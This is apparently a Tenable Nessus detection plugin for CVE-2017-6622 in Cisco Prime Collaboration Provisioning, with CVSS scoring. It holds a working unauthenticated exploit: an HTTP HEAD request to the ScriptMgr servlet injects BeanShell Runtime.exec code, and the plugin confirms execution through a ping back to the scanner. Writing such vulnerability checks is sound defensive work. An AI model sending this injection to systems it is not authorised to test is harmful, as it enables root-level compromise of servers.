CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
98.4%
The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.
Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(101531);
script_version("1.6");
script_cvs_date("Date: 2019/03/06 18:38:55");
script_cve_id("CVE-2017-6622");
script_bugtraq_id(98520);
script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724");
script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1");
script_xref(name:"ZDI", value:"ZDI-17-445");
script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE");
script_summary(english:"Attempts to perform a remote command injection.");
script_set_attribute(attribute:"synopsis", value:
"The remote network management server is affected by a remote command
execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote Cisco Prime Collaboration Provisioning server is affected
by a remote command execution vulnerability in the ScriptMgr servlet
due to a failure to restrict the HTTP HEAD method. An unauthenticated,
remote attacker can exploit this to bypass authentication and execute
arbitrary commands with root privileges.
Note that the remote Cisco Prime Collaboration Provisioning server is
reportedly affected by additional vulnerabilities; however, Nessus has
not tested for these.");
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/");
script_set_attribute(attribute:"solution", value:
"Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or
later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17");
script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning");
script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CISCO");
script_copyright(english:"This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.");
script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin");
script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
# Make sure pcp is detected
get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version");
port = get_http_port(default:443);
# Vulnerable ScriptMgr servlet is reached through mod_jk
banner = get_http_banner(port:port);
if (banner !~ "Server:.*Apache.*mod_jk")
{
audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}
pat = SCRIPT_NAME;
if(strlen(pat) > 16)
pat = substr(pat, 0, 15);
cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + compat::this_host();
qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");';
uri = "/cupm/ScriptMgr?" + qs;
method = "HEAD";
res = http_send_recv3(
method : method,
item : uri,
port : port,
exit_on_fail : TRUE
);
if(res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
{
filter = "icmp and src " + get_host_ip() + " and dst " + compat::this_host() +
" and icmp[icmptype] = icmp-echo";
bpf = bpf_open(filter);
if(isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open");
timeout = 5;
t = unixtime();
repeat
{
frame = bpf_next(bpf:bpf);
# ping back seen: cmd injection succeeded !
if (frame && pat >< frame)
{
vuln = TRUE;
break;
}
}until(unixtime() - t > timeout);
bpf_close(bpf);
}
if(vuln)
{
req = http_last_sent_request();
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
request : make_list(req)
);
}
else
{
audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
98.4%